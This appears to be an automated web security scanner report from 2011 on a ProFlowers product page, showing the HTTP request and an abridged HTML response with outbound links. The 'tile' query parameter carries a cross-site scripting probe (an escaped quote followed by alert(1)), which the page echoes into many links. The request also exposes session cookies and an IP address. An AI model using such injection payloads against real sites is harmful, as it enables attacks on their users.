Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:18:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:18:27 GMT
Content-Length: 136888


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
</title>
<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_productdetail.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom_pfc.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />
       <meta id="_metaDescription" name="Description" content="Send flowers and gifts including Deluxe Succulent Garden from ProFlowers.com. Flowers and gifts are available for any holiday or occasion.">
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="innerContainer">
           <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
l="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
l="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="personalCreationLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a id="productDetailBody_ctl09__homeLink" border="0" title="Go to ProFlowers Homepage" href="http://www.proflowers.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef"><img class="PFLogo" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" style="border-width:0px;" /></a>
...[SNIP]...
<li><a class="headerLink" href="http://www.bridesign.com" target="_blank">Wedding</a>
...[SNIP]...
<div class="rushDeliveryBox StandardSize">Need it <a id="productDetailBody_ctl09_ctl91__repeater_ctl00__pcHyperLink" rel="nofollow" href="http://www.floristexpress.net?refcode=XSD&amp;RefPage=PFC_PRODUCT-30008396" target="_blank">Today</a>
...[SNIP]...
<a href="http://www.proflowers.com/radio/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef&amp;how=home"><img class="RadioIcon_Control" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="ProFlowers on the Radio" style="border-width:0px;" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a> <a class="Lckdwn3_Nav_PFC_Mothers_Show" href="http://www.floristexpress.net?pfc=1&amp;refcode=MDN&amp;LinkLocation=NavBar">Mother's Day</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Occasion_Show"><a class="mothersDay" href="http://www.floristexpress.net?pfc=1&amp;refcode=OMD&amp;LinkLocation=NavBar">Mother's Day - 5/8</a>
...[SNIP]...
<li><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=PFC&amp;LinkLocation=NavBar">Local Florist Delivery</a>
...[SNIP]...
<li style="border-bottom:none;"><a class="wedding" href="http://www.bridesign.com" target="_blank">Wedding Flowers</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Hide"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=pfc&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Show"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?pfc=1&amp;refcode=FMD&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
Body_ctl09_ctl117_submit2" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef" style="display:inline-block;height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<div class="ProductInfoImage">
                           <img id="productDetailBody_productImage" class="productimagedimension" border="0" prvdid="productImage" RenderDivWhenInvisible="true" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=300&amp;hei=350" style="height:350px;width:300px;border-width:0px;" />
                       </div>
...[SNIP]...
<div id="productDetailBody_FlynnMagazeeny_divPicture" class="magPicture"> <img id="productDetailBody_FlynnMagazeeny_imgPicture" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/NTR_PD_Body_PFC_FLN_50_67_ReadersDigest_TB.gif" style="border-width:0px;" /> </div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shUpgradesHeader_image" class="Step_1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shMainAccessorySelectionHeader_image" class="Step_2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00__productImage" prvdid="productimage" class="selectedImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shZipCodeHeader_image" class="Step_4" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shDeliveryDateSelectionHeader_image" class="Step_3" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl00__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30008396" target="_blank">Today</a>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl01__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30008396" target="_blank">Sunday</a>
...[SNIP]...
<td align="left" valign="top" style="width:28px;"><img id="productDetailBody_deliveryCalendar_Image1" class="calendar_button" prvdid="calendar_button" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/icon_Calendar_DeliveryTime.gif" src="" style="border-width:0px;margin-left:5px; cursor:pointer;" /></td>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl00__pcHyperLink" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30008396" target="_blank">Today</a>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl01__pcHyperLink" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30008396" target="_blank">Sunday</a>
...[SNIP]...
<div class="AccessoryImages">
       <img id="productDetailBody_accPreview_Repeater1_ctl00_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />

   </div>
...[SNIP]...
/flowers/Deluxe-Hugs-and-Kisses-5519?viewpos=1&amp;trackingpgroup=YMA&amp;tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Deluxe Hugs and Kisses" style="border-width:0px;" /></a>
...[SNIP]...
owers/Mardi-Gras-Orchid-Garden-42864?viewpos=1&amp;trackingpgroup=YMA&amp;tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Mardi Gras Orchid Garden" style="border-width:0px;" /></a>
...[SNIP]...
hers-Day-Bouquet-30050137?viewpos=1&amp;trackingpgroup=RecentlyViewed&amp;tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Deluxe Mother's Day Bouquet" style="border-width:0px;" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"><img id="productDetailBody_PCImage1" class="Ribbon25Mil" text="25 Million Orders Shipped" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
"text" value="Enter Your Email Here" id="productDetailBody_footer_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
</div><img class="shopOurBrandFamily" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" style="height:20px;width:181px;border-width:0px;" /> <br />
...[SNIP]...
eed to last at least 7 days." border="0" href="http://www.proflowers.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." style="border-width:0px;" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." style="border-width:0px;" /></a>
...[SNIP]...
" border="0" rel="nofollow" href="http://www.proflowers.com/international?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" style="border-width:0px;" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." style="border-width:0px;" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." style="border-width:0px;" /></a> <a title="Unique personalized gifts for life...s special occasions." 
border="0" href="http://www.personalcreations.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." style="border-width:0px;" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." style="border-width:0px;" /></a>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...
</script>

       
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
